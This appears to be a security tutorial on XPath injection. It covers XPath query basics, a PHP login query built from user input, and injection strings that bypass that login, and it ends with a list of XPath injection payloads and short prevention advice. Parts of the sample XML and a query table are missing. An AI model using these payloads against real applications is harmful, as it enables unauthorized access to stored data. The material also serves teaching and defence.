XPath Injection attacks occur when a web site uses user-supplied information to construct an XPath query for XML data XPath is a standard language. When using XML for a web site it is common to accept some form of input on the query string to identify the content to locate and display on the page.

By sending intentionally malformed information into the web site, an attacker can find out how the XML data is structured, or access data that he may not normally have access to.

Querying XML is done with XPath, a type of simple descriptive statement that allows the XML query to locate a piece of information.

This input must be sanitized to verify that it doesn’t mess up the XPath query and return the wrong data. No access controls can be implemented within the XML document. Consequently, the entire XML document can be read out in the event of an XPath injection.


What is XPATH?

XPath is a major element in the XSLT standard. XPath can be used to navigate through elements and attributes in an XML document.

display of the XML document as a tree

Based on the image above, we describe each level within the XML sample in the following table.

XPath query

Result of the XPath query


The root node accounts are selected.


All nodes with the name ‘user’ are selected.


All user nodes that are child nodes of the accounts node are selected.


The user node that includes the user name 1337h4×0r is returned. An absolute path starts with /.


The user node that includes the e-mail address john@company.com is returned. A relative path starts with //. This selects all nodes that meet the condition(s) set, no matter where in the tree the nodes are located.


This selects all child nodes of the accounts node.


This selects the user node at this position. Warning: Since the index starts at 1, this selects the node of the user johnnynormal.

XPATH Example


<?xml version="1.0" encoding="UTF-8"?>


<user category="user1">

<username>vry4n</username >

<firstname>Bryan</firstname >






<user category="user2">








<system category="sys1">

<os>windows</os >


<version>Windows Server 2008</version>



<system category="sys2">

<os>linux</os >


<version>Ubuntu Server</version>




Basic queries


1. Select the root node “accounts”, and print the child contents, notice that only one element is returned with whole data

  • /accounts

2. Make a selection per child node, now, we have 2 elements printed

  • /accounts/user
  • //user

  • /accounts/system
  • //system

Child node content filter

  • /accounts/user/email

Filtering Queries

Select a child node that has vry4n as username

  • /accounts/user[username="vry4n"]
  • //user[username="vry4n"]

Select a child node that has windows as os

  • /accounts/system[os="windows"]
  • //system[os="windows"]

Print sys1 attribute category data, within system child node

  • /accounts/system[@category="sys1"]
  • //system[@category="sys1"]

Example 2

  • /accounts/user[attribute::category="user2"]
  • //user[attribute::category="user2"]

Select all child nodes, under accounts root node

  • /accounts/child::node()

Filter child nodes, within user nodes

  • /accounts/user/child::node()
  • //user/child::node()

Filter child nodes, within user nodes

  • /accounts/child::system()
  • //child::system()

filter a specific user child node

  • /accounts/user[username="vry4n"]/child::node()
  • //user[username="vry4n"]/child::node()

Filter by position

  • /accounts/user[position()=2]
  • //user[position()=2]

Filter by position

  • /accounts/user[2]
  • //user[2]

Filter by last position

  • /accounts/system[last()]
  • //system[last()]

Some Functions


1. Counting the nodes in root or child nodes

in this case the result is 2 “user1”,”user2”


  • count(//user)
  • count(/accounts/user)


Returns the length of a specified string


  • string-length(/accounts/user[1]/email)


Returns the substring from start to the specified length. First character is 1. Email is <email>notyourbusiness@vk9-sec.com</email>


  • substring(/accounts/user[1]/email,1,7)


Returns True if string1 starts with string2, in this case the value is vry4n

  • starts-with(//user[1]/username,v)


Returns True if string1 contains string2, in this case the value is vry4n

  • contains(//user[1]/username,r)

String & number

Returns the value of the argument

  • string(//user[1]/username)

The same happens if the value is numeric, if we pass a string we get false

  • number(//user[1]/username)

Exploitation example

<Employee ID="1">



<Signature>g0t r00t?</Signature>



<Employee ID="2">



<Signature>Zombie Films Rock!</Signature>



<Employee ID="3">



<Signature>I like the smell of confunk</Signature>



Example of a query that a script uses to retrieve data

In this example we have an authentication mechanism that accepts username & password

Php code


  • $lXPathQueryString = "//Employee[UserName='{USERNAME}' and Password='{PASSWORD}']";


1. Using the regular authentication method constructs the following query

  • $lXPathQueryString = "//Employee[UserName='admin' and Password='admin']";

2. Exploiting this query we can inject a query and modify its behavior, to show the whole database

  • the first step is to insert a single quote (') in the field to be tested,
  • introducing a syntax error in the query
  • check whether the application returns an error message.

Username: admin’ or 1=1 or 'a'='a

Password: admin123

  • $lXPathQueryString = "//Employee[UserName= admin’ or 1=1 or 'a'='a' and Password='admin123']";

In this case, only the first part of the XPath needs to be true. The password part becomes irrelevant, and the UserName part will match ALL employees because of the “1=1” which is always true.

3. To show a single user results, if it exists

admin' or 'a'='a

  • $lXPathQueryString = "//Employee[UserName=’admin’ or 'a'='a' and Password='admin123']";

The password can also be text' or '1' = '1

  • $lXPathQueryString = "//Employee[UserName=’admin’ or 'a'='a' and Password=’text' or '1' = '1']";


XPath injection attacks are much like SQL injection attacks. Most of these preventative methods are the same as well to prevent other typical code injection attacks.

  • Input Validation: It is one of the best measures to defend applications from XPATH injection attacks. The developer has to ensure that the application does accept only legitimate input.
  • Parameterization: In Parameterized queries, the queries are precompiled and instead of passing user input as expressions, parameters are passed.

Most sites have a way to store data, the most common of which is a database. However, some sites use XML to store data, and use a method of looking at the data known as XPath.


  • ' or '1'='1
  • ' or ''='
  • x' or 1=1 or 'x'='y
  • /
  • //
  • //*
  • */*
  • @*
  • count(/child::node())
  • x' or name()='username' or 'x'='y
  • ' and count(/*)=1 and '1'='1
  • ' and count(/@*)=1 and '1'='1
  • ' and count(/comment())=1 and '1'='1